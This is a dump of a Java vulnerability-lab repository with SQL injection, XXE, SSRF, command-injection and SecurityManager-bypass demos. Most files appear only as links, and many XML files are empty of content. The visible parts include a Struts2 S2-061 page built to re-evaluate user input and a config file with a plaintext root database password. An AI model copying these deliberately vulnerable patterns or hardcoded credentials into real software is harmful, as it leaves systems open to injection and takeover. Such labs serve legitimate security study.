/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.hbm.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/utils/HibernateUtils.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/hibernate/utils/HibernateUtils.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/sqli/jdbc/JdbcSqli.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/jdbc/JdbcSqli.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/MybatisSqli.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/MybatisSqli.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 |
10 |
13 |
16 |
19 |
20 |
21 |
22 |
25 |
28 |
34 |
37 |
49 |
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/pojo/User.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/pojo/User.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/utils/MybatisUtils.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/sqli/mybatis/utils/MybatisUtils.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByClassloader.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByClassloader.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByReflection.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByReflection.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/Evil.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/Evil.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/MyClassLoader.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/MyClassLoader.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/SetSecurityManagerNullBypass.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/SetSecurityManagerNullBypass.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/CreatePolicy.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/CreatePolicy.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/TestFilePolicy$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/TestFilePolicy$1.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/TestFilePolicy.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/TestFilePolicy.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/DocumentBuilderXXE.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/DocumentBuilderXXE.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/Payloads.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/Payloads.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXBuilderXXE.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXBuilderXXE.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXHandel.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXHandel.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXParserFactoryXXE.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXParserFactoryXXE.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXReadXXE.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXReadXXE.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXTransformerFactoryXXE.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/SAXTransformerFactoryXXE.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/TransformerFactoryXXE.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/TransformerFactoryXXE.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/XXE.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/securitymissconfig/xxe/XXE.class
--------------------------------------------------------------------------------
/owasp/target/classes/com/r17a/commonvuln/ssrf/Ssrf.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/ssrf/Ssrf.class
--------------------------------------------------------------------------------
/owasp/target/classes/hibernate.cfg.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 |
8 |
9 | thread
10 |
11 | com.mysql.cj.jdbc.Driver
12 | jdbc:mysql://localhost:3306/users?serverTimezone=UTC
13 | root
14 | 1qazXSW@3edc
15 |
16 |
17 | true
18 |
19 | true
20 |
21 |
22 | org.hibernate.dialect.MySQLDialect
23 |
24 |
25 |
26 |
27 |
--------------------------------------------------------------------------------
/owasp/target/classes/mybatis-config.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
--------------------------------------------------------------------------------
/owasp/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst:
--------------------------------------------------------------------------------
1 | com\r17a\commonvuln\injection\sqli\hibernate\pojo\User.class
2 | com\r17a\commonvuln\securitymissconfig\securitymanager\BypassByReflection.class
3 | com\r17a\commonvuln\securitymissconfig\securitymanager\policy\TestFilePolicy$1.class
4 | com\r17a\commonvuln\injection\expression\ognl\OgnlTest.class
5 | com\r17a\commonvuln\injection\sqli\mybatis\pojo\User.class
6 | com\r17a\commonvuln\injection\command\ProcessCmdInject.class
7 | com\r17a\commonvuln\injection\sqli\nativesql\NativeSqli.class
8 | com\r17a\commonvuln\securitymissconfig\xxe\SAXTransformerFactoryXXE.class
9 | com\r17a\commonvuln\file\FileDelete.class
10 | com\r17a\commonvuln\securitymissconfig\xxe\SAXHandel.class
11 | com\r17a\commonvuln\injection\expression\ognl\bean\Student.class
12 | com\r17a\commonvuln\securitymissconfig\xxe\DocumentBuilderXXE.class
13 | com\r17a\commonvuln\securitymissconfig\securitymanager\Evil.class
14 | com\r17a\commonvuln\injection\redirect\UrlRedirect.class
15 | com\r17a\commonvuln\injection\sqli\hibernate\HibernateSqli.class
16 | com\r17a\commonvuln\securitymissconfig\securitymanager\SetSecurityManagerNullBypass.class
17 | com\r17a\commonvuln\injection\expression\mvel\MvelTest.class
18 | com\r17a\commonvuln\securitymissconfig\securitymanager\policy\TestFilePolicy.class
19 | com\r17a\commonvuln\injection\sqli\mybatis\MybatisSqli.class
20 | com\r17a\commonvuln\file\FileUnzip.class
21 | com\r17a\commonvuln\securitymissconfig\securitymanager\policy\CreatePolicy.class
22 | com\r17a\commonvuln\securitymissconfig\securitymanager\BypassByClassloader.class
23 | com\r17a\commonvuln\injection\expression\ognl\bean\SchoolMaster.class
24 | com\r17a\commonvuln\securitymissconfig\securitymanager\MyClassLoader.class
25 | com\r17a\commonvuln\securitymissconfig\xxe\Payloads.class
26 | com\r17a\commonvuln\injection\sqli\mybatis\utils\MybatisUtils.class
27 | com\r17a\commonvuln\injection\expression\spel\SpelTest.class
28 | com\r17a\commonvuln\injection\sqli\jdbc\JdbcSqli.class
29 | com\r17a\commonvuln\file\FileUploadOrDownload.class
30 | com\r17a\commonvuln\securitymissconfig\xxe\SAXBuilderXXE.class
31 | com\r17a\commonvuln\cors\Cors.class
32 | com\r17a\commonvuln\ssrf\Ssrf.class
33 | com\r17a\commonvuln\injection\expression\ognl\OgnlTest$1.class
34 | com\r17a\commonvuln\securitymissconfig\xxe\SAXReadXXE.class
35 | com\r17a\commonvuln\securitymissconfig\xxe\XXE.class
36 | com\r17a\commonvuln\injection\command\RuntimeCmdInject.class
37 | com\r17a\commonvuln\injection\expression\ognl\bean\School.class
38 | com\r17a\commonvuln\securitymissconfig\xxe\TransformerFactoryXXE.class
39 | com\r17a\commonvuln\injection\sqli\hibernate\utils\HibernateUtils.class
40 | com\r17a\commonvuln\securitymissconfig\xxe\SAXParserFactoryXXE.class
41 |
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | com.r17a
8 | JavaVulnSummary
9 | pom
10 | 1.0-SNAPSHOT
11 |
12 | fastjson
13 | jenkins
14 | jndi
15 | ysoserial
16 | weblogic
17 | xstream
18 | owasp
19 | common
20 | struts2
21 | confluence
22 | jboss
23 | log4j
24 |
25 |
26 |
27 |
--------------------------------------------------------------------------------
/struts2/src/main/java/com/r17a/action/IndexAction.java:
--------------------------------------------------------------------------------
1 | package com.r17a.action;
2 |
3 | import com.opensymphony.xwork2.ActionSupport;
4 |
5 | /**
6 | * 本实验代码参考vulhub
7 | * TODO config tomcat
8 | * */
9 | public class IndexAction extends ActionSupport {
10 |
11 | private String id;
12 |
13 |
14 | public String changeId(){
15 | return SUCCESS;
16 | }
17 |
18 | public String getId() {
19 | return id;
20 | }
21 |
22 | public void setId(String id) {
23 | this.id = id;
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/struts2/src/main/resources/struts.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 | index.jsp
14 |
15 |
16 |
--------------------------------------------------------------------------------
/struts2/src/main/webapp/WEB-INF/web.xml:
--------------------------------------------------------------------------------
1 |
2 |
6 |
7 | struts2
8 | org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter
9 |
10 |
11 | struts2
12 | /*
13 |
14 |
--------------------------------------------------------------------------------
/struts2/src/main/webapp/index.jsp:
--------------------------------------------------------------------------------
1 | <%@ page
2 | language="java"
3 | contentType="text/html; charset=UTF-8"
4 | pageEncoding="UTF-8" %>
5 | <%@ taglib prefix="s" uri="/struts-tags" %>
6 |
7 |
8 |
9 | S2-061 demo
10 |
11 |
12 |
13 | your input id: ${id}
14 |
has ben evaluated again in id attribute
15 |
16 |
17 |
--------------------------------------------------------------------------------
/struts2/target/classes/com/r17a/action/IndexAction.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/classes/com/r17a/action/IndexAction.class
--------------------------------------------------------------------------------
/struts2/target/classes/struts.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 | index.jsp
14 |
15 |
16 |
--------------------------------------------------------------------------------
/struts2/target/struts2.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2.war
--------------------------------------------------------------------------------
/struts2/target/struts2/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Created-By: IntelliJ IDEA
3 | Built-By: 29176
4 | Build-Jdk: 1.8.0_181
5 |
6 |
--------------------------------------------------------------------------------
/struts2/target/struts2/WEB-INF/classes/com/r17a/action/IndexAction.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/classes/com/r17a/action/IndexAction.class
--------------------------------------------------------------------------------
/struts2/target/struts2/WEB-INF/classes/struts.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 | index.jsp
14 |
15 |
16 |
--------------------------------------------------------------------------------
/struts2/target/struts2/WEB-INF/lib/commons-collections-3.2.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/commons-collections-3.2.2.jar
--------------------------------------------------------------------------------
/struts2/target/struts2/WEB-INF/lib/commons-fileupload-1.4.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/commons-fileupload-1.4.jar
--------------------------------------------------------------------------------
/struts2/target/struts2/WEB-INF/lib/commons-io-2.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/commons-io-2.6.jar
--------------------------------------------------------------------------------
/struts2/target/struts2/WEB-INF/lib/commons-lang3-3.8.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/commons-lang3-3.8.1.jar
--------------------------------------------------------------------------------
/struts2/target/struts2/WEB-INF/lib/freemarker-2.3.30.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/freemarker-2.3.30.jar
--------------------------------------------------------------------------------
/struts2/target/struts2/WEB-INF/lib/javassist-3.20.0-GA.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/javassist-3.20.0-GA.jar
--------------------------------------------------------------------------------
/struts2/target/struts2/WEB-INF/lib/log4j-api-2.12.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/log4j-api-2.12.1.jar
--------------------------------------------------------------------------------
/struts2/target/struts2/WEB-INF/lib/ognl-3.1.28.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/ognl-3.1.28.jar
--------------------------------------------------------------------------------
/struts2/target/struts2/WEB-INF/lib/struts2-core-2.5.25.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/struts2/target/struts2/WEB-INF/lib/struts2-core-2.5.25.jar
--------------------------------------------------------------------------------
/struts2/target/struts2/WEB-INF/web.xml:
--------------------------------------------------------------------------------
1 |
2 |
6 |
7 | struts2
8 | org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter
9 |
10 |
11 | struts2
12 | /*
13 |
14 |
--------------------------------------------------------------------------------
/struts2/target/struts2/index.jsp:
--------------------------------------------------------------------------------
1 | <%@ page
2 | language="java"
3 | contentType="text/html; charset=UTF-8"
4 | pageEncoding="UTF-8" %>
5 | <%@ taglib prefix="s" uri="/struts-tags" %>
6 |
7 |
8 |
9 | S2-061 demo
10 |
11 |
12 |
13 | your input id: ${id}
14 |
has ben evaluated again in id attribute
15 |
16 |
17 |
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/aopalliance-repackaged-2.6.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/aopalliance-repackaged-2.6.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/coherence-20.12.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/coherence-20.12.2.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/coherence-management-20.12.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/coherence-management-20.12.2.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/coherence-rest.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/coherence-rest.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/coherence-web.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/coherence-web.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/eclipselink.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/eclipselink.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/hk2-api-2.6.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/hk2-api-2.6.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/hk2-locator-2.6.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/hk2-locator-2.6.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/hk2-utils-2.6.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/hk2-utils-2.6.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jackson-annotations-2.12.0.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-annotations-2.12.0.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jackson-core-2.12.0.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-core-2.12.0.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jackson-databind-2.12.0.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-databind-2.12.0.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jackson-jaxrs-base-2.12.0.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-jaxrs-base-2.12.0.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jackson-jaxrs-json-provider-2.12.0.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-jaxrs-json-provider-2.12.0.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jackson-module-jaxb-annotations-2.12.0.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-module-jaxb-annotations-2.12.0.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jakarta.activation-1.2.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.activation-1.2.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jakarta.activation-api-1.2.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.activation-api-1.2.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jakarta.annotation-api-1.3.5.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.annotation-api-1.3.5.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jakarta.inject-2.6.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.inject-2.6.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jakarta.validation-api-2.0.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.validation-api-2.0.2.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jakarta.ws.rs-api-2.1.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.ws.rs-api-2.1.6.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jakarta.xml.bind-api-2.3.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.xml.bind-api-2.3.2.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/javassist-3.25.0-GA.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/javassist-3.25.0-GA.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jersey-client-2.30.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-client-2.30.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jersey-common-2.30.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-common-2.30.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jersey-entity-filtering-2.30.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-entity-filtering-2.30.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jersey-hk2-2.30.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-hk2-2.30.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jersey-media-jaxb-2.30.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-media-jaxb-2.30.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jersey-media-json-jackson-2.30.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-media-json-jackson-2.30.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/jersey-server-2.30.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-server-2.30.1.jar
--------------------------------------------------------------------------------
/weblogic/lib/jar_files/osgi-resource-locator-1.0.3.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/osgi-resource-locator-1.0.3.jar
--------------------------------------------------------------------------------
